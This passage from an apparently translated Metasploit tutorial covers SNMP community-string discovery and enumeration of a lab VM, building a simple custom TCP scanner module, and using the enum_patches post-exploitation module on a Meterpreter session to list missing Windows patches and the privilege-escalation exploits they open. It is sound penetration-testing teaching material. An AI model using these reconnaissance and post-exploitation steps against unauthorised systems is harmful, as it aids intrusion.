[*] 192.168.1.50 'public' 'APC Web/SNMP Management Card (MB:v3.8.6 PF:v3.5.5 PN:apc_hw02_aos_355.bin AF1:v3.5.5 AN1:apc_hw02_sumx_355.bin MN:AP9619 HR:A10 SN: NA0827001465 MD:07/01/2008) (Embedded PowerNet SNMP Agent SW v2.2 compatible)'
[*] Auxiliary module execution completed
正如我们在这里看到的,我们能够找到一个"公共"的社区字符串。这很可能是只读的,不会显示大量信息。我们确实了解到该设备是APC Web / SNMP设备,以及它正在运行的版本。
3)SNMP 枚举
使用SNMP扫描模块时,我们可以收集大量信息,例如开放端口,服务,主机名,进程和正常运行时间等。使用我们的Metasploitable虚拟机作为我们的目标,我们将auxiliary/scanner/snmp/snmp_enum模块,看看它将为我们提供哪些信息。首先,我们加载模块并使用存储在工作区中的信息设置"RHOST"选项。使用host -R
将为我们设置此选项。
msf auxiliary(snmp_enum) > run
[+] 172.16.194.172, Connected.
[*] System information:
Host IP : 172.16.194.172
Hostname : metasploitable
Description : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 02:35:38.71
Uptime system : 00:20:13.21
System date : 2012-7-9 18:11:11.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 19
TCP segments sent : 21
TCP segments retrans : 0
Input datagrams : 5055
Delivered datagrams : 5050
Output datagrams : 4527
...snip...
[*] Device information:
Id Type Status Descr
768 Processor unknown GenuineIntel: Intel(R) Core(TM) i7-2860QM CPU @ 2.50GHz
1025 Network unknown network interface lo
1026 Network unknown network interface eth0
1552 Disk Storage unknown SCSI disk (/dev/sda)
3072 Coprocessor unknown Guessing that there's a floating point co-processor
[*] Processes:
Id Status Name Path Parameters
1 runnable init /sbin/init
2 runnable kthreadd kthreadd
3 runnable migration/0 migration/0
4 runnable ksoftirqd/0 ksoftirqd/0
5 runnable watchdog/0 watchdog/0
6 runnable events/0 events/0
7 runnable khelper khelper
41 runnable kblockd/0 kblockd/0
68 runnable kseriod kseriod
...snip...
5696 runnable su su
5697 runnable bash bash
5747 running snmpd snmpd
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- 查看我们的 SNMP 扫描
我们的SNMP扫描提供的上述输出为我们提供了有关目标系统的大量信息。尽管裁剪了长度,但我们仍然可以看到有关目标的许多相关信息,例如其处理器类型,进程ID等。
6. 编写您自己的安全扫描程序
1)使用您自己的 METASPLOIT 辅助模块
有时您可能需要特定的网络安全扫描程序,或者在Metasploit中执行扫描活动比使用外部程序更容易编写脚本。Metasploit有很多功能可以派上用场,比如访问所有漏洞利用类和方法,内置支持代理、SSL、报告和内置线程。想想您可能需要在系统上找到密码的每个实例,或扫描自定义服务的情况。更不用说,编写自己的自定义扫描仪相当快速和容易。
许多 Metasploit 扫描仪功能包括:
它提供对所有漏洞利用类和方法的访问
为代理、SSL 和报告提供支持
内置线程和范围扫描
易于编写和快速运行
在安全审核期间,编写自己的扫描程序模块也非常有用,因为它允许您找到错误密码的每个实例,或者您可以在内部扫描需要修补的易受攻击的服务。使用Metasploit框架将允许您将此信息存储在数据库满足组织和以后的报告需求。
我们将使用这个非常简单的TCP扫描仪,它将连接到默认端口12345上的主机,该端口可以在运行时通过扫描仪模块选项进行更改。连接到服务器后,它会发送"HELLO SERVER",接收响应并将其与远程主机的IP地址一起打印出来。
require 'msf/core'
class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'My custom TCP scan',
'Version' => '$Revision: 1 $',
'Description' => 'My quick scanner',
'Author' => 'Your name here',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(12345)
], self.class)
end
def run_host(ip)
connect()
greeting = "HELLO SERVER"
sock.puts(greeting)
data = sock.recv(1024)
print_status("Received: #{data} from #{ip}")
disconnect()
end
end
2)保存和测试我们的辅助模块
我们将文件作为 simple_tcp.rb 保存到 ./modules/auxiliary/scanner/ 目录中,然后加载 msfconsole。在这里注意两件事很重要。首先,模块是在运行时加载的,因此除非我们重新启动所选的接口,否则我们的新模块将不会显示。第二个是文件夹结构非常重要,如果我们将扫描仪保存在 ./modules/auxiliary/scanner/http/http/ 下,它将在模块列表中显示为 scannana/http/simple_tcp 。
要测试我们的安全扫描程序,请在端口 12345 上设置一个 netcat 侦听器,并在文本文件中通过管道传输以充当服务器响应。
root@kali:~# nc -lnvp 12345 < response.txt
listening on [any] 12345 ...
接下来,选择新的扫描仪模块,设置其参数,然后运行它以查看结果。
msf > use scanner/simple_tcp
msf auxiliary(simple_tcp) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(simple_tcp) > run
[*] Received: hello metasploit from 192.168.1.100
[*] Auxiliary module execution completed
从这个简单的示例中可以看出,当您在渗透测试过程中需要一些自定义代码时,这种级别的多功能性可以有很大的帮助。框架和可重用代码的强大功能在这里真正闪耀。
3)从我们的安全扫描程序报告结果
报告 mixin 提供了report_*()。这些方法依赖于数据库才能运行:
- 检查实时数据库连接
- 检查重复记录
- 将记录写入表中
数据库驱动程序现在自动装入。
db_driver postgres (or sqlite3, mysql)
在扫描仪代码中使用Auxiliary::Report混合。
include Msf::Auxiliary::Report
然后,调用 report_note() 方法。
report_note(
:host => rhost,
:type => "myscanner_password",
:data => data
)
学习编写自己的网络安全扫描程序似乎是一项艰巨的任务,但正如我们刚刚展示的那样,创建自己的网络安全扫描程序的好处辅助模块容纳和运行我们的安全扫描程序将帮助我们存储和组织数据,更不用说在渗透测试期间帮助我们撰写报告了。
7. WINDOWS 补丁枚举
1)枚举已安装的 WINDOWS 修补程序
当遇到 Windows 目标时,确定已应用哪些修补程序是了解是否定期更新的简单方法。它还可能提供有关系统上存在的其他可能漏洞的信息。
专门为此任务创建了一个辅助模块,称为enum_patches。与任何后开发模块一样,它是使用 use
命令加载的。
msf exploit(handler) > use post/windows/gather/enum_patches
msf post(enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patchs for which there is a MSF local module
SESSION yes The session to run this module on.
此模块还具有一些高级选项,可以使用 show advanced
命令显示这些选项。
msf post(enum_patches) > show advanced
Module advanced options (post/windows/gather/enum_patches):
Name : VERBOSE
Current Setting: true
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
使用Windows目标启动 Meterpreter 会话后,加载enum_patches模块设置"session"选项。完成后,使用run
命令将针对我们的目标启动模块。
msf post(enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patchs for which there is a MSF local module
SESSION 1 yes The session to run this module on.
msf post(enum_patches) > run
[*] KB2871997 applied
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[*] KB2305420 applied
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed